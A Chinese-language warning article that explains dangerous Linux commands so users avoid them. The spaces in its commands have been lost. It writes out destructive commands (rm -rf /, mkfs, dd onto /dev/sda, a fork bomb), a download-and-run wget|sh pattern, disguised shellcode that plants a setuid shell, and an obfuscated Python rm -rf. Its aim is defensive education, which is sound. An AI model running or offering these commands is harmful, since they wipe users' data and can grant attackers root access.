本文列出的命令千万不要运行,即使你觉得很好奇,除非你是在虚拟机上运行(有问题可以恢复),因为它们真的会毁掉你的系统。所以最好不要在root等高管理权限下执行命令,这是个好习惯。Linux系统迟早会像Windows一样普及,使用它的人会越来越多,包括那些不太懂电脑的人。这篇文章的目的就是要告诉大家:Linux在给你最大程度的自由的同时,也让系统更容易被破坏。如果不理解某些命令的含义,下载并执行包含恶意命令的脚本,或者被诱骗运行某些命令,很容易让你哭的来不及。这并不是说Linux不安全,而是说Linux在不懂Linux而且很粗心的人面前很没有安全感。不管是Windows还是Linux,人本身就是最大的不安全因素。rm下的以下命令将删除硬盘上的文件。rm的-r递归删除和-f强制删除是非常危险的选项。即使在日常操作中,也会误删文件。sudorm-rf/删除根分区sudorm-rf中的所有文件。删除当前目录下的所有文件sudorm-rf*同上rm-rf*orrm-rf*.*同上rm-rf~/&删除root分区和home目录,即使你不是root,home目录没有免疫力。格式化命令同样,如果你不知道mkfs.xxxx(xxxx可以是vfat、ext2、ext3、bfs...)是一个格式化命令,运行以下命令将擦除你的硬盘分区:sudomkfs.xxxxdddd功能强大IO输入输出定向工具,如果使用不当,破坏性很大,不仅是当前分区,是当前系统,有时甚至是整个硬盘。sudoddif=/dev/zeroof=/dev/sda清除所有硬盘。sudoddif=/dev/sdaof=/dev/sdb用第一个硬盘的内容覆盖第二个硬盘的内容。sudoddif=somethingof=/dev/sda将垃圾数据写入硬盘。将命令结果指向硬盘也是一样,直接将命令结果指向硬盘相当于往硬盘写入垃圾数据:any_command>/dev/sda用随机数据破坏硬盘上的sda和sdb,并且可能是其他类似的名字。Linux的/dev系统为操作硬件提供了便捷而强大的功能,也让破坏变得更加容易。fork命令fork命令打开一个子进程。如果fork放在***循环中,子进程最终会耗尽所有内存资源::(){:|:&};:语句的缩写形式难以理解符号可以使Shellfork子进程不断地,***导致内存用完,必须重新启动。这不是错误,但Shell语句是故意以缩写形式编写的。以下情况也是如此:有时候forkwhilefork压缩包也是一个破坏源~有些压缩包需要你解压到某个系统已经存在的目录下。有成千上万个不同文件名的小文件试图覆盖您现有的文件。一些压缩包看起来很小,但解压后是千兆字节的垃圾数据,这些数据会淹没您的硬盘。从非官方网站下载的程序和脚本也可能包含恶意命令,不要随便执行:wget[url]http://some_place/some_file[/url]sh./some_filewget[url]http://hax018r.org/malicious-script[/url]sh./malicious-script加载脚本加载脚本要保证来源合法,有能力的可以阅读它的代码。即使有源代码的程序,也不要随便编译执行:charesp[]__attribute__((section(".text")))/*e.s.prelease*/="xebx3ex5bx31xc0x50x54x5ax83xecx64x68""xffxffxffxffx68xdfxd0xdfxd9x68x8dx99""xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7""x56x04xf7x56x08xf7x56x0cx83xc4x74x56""x8dx73x08x56x53x54x59xb0x0bxcdx80x31""xc0x40xebxf9xe8xbdxffxffxffx2fx62x69""x6ex2fx73x68x00x2dx63x00""cp-p/bin/sh/tmp/.beyond;chmod4755/tmp/.beyond;";上面看起来就是一堆无意义的十六进制数据,如果有人告诉你,运行这个程序,不用输入密码就可以获得系统的root权限。不要相信他,上面的程序实际上运行了“rm-rf~/&”。也可以使用python等脚本语言造成破坏:python-c'importos;os.system("".join([chr(ord(i)-1)foriin"sn!.sg!"]))'这个程序实际上会执行rm-rf*,也许你想知道"sn!.sg!"是什么?上面程序的结尾意味着,它实际上是每个字母旁边的rm-rf*!如何避免运行恶意程序?***不要将root作为日常用户使用。对于以上程序,如果当前用户不是root,危害范围会小很多。二是知道哪些命令是干什么用的,不知道的命令不要跑。在运行可能具有破坏性的程序时,请小心检查您的输入。三是确保软件和脚本来源合法。***有一点,虽然比较消极,但确实很重要:经常备份你的数据!!
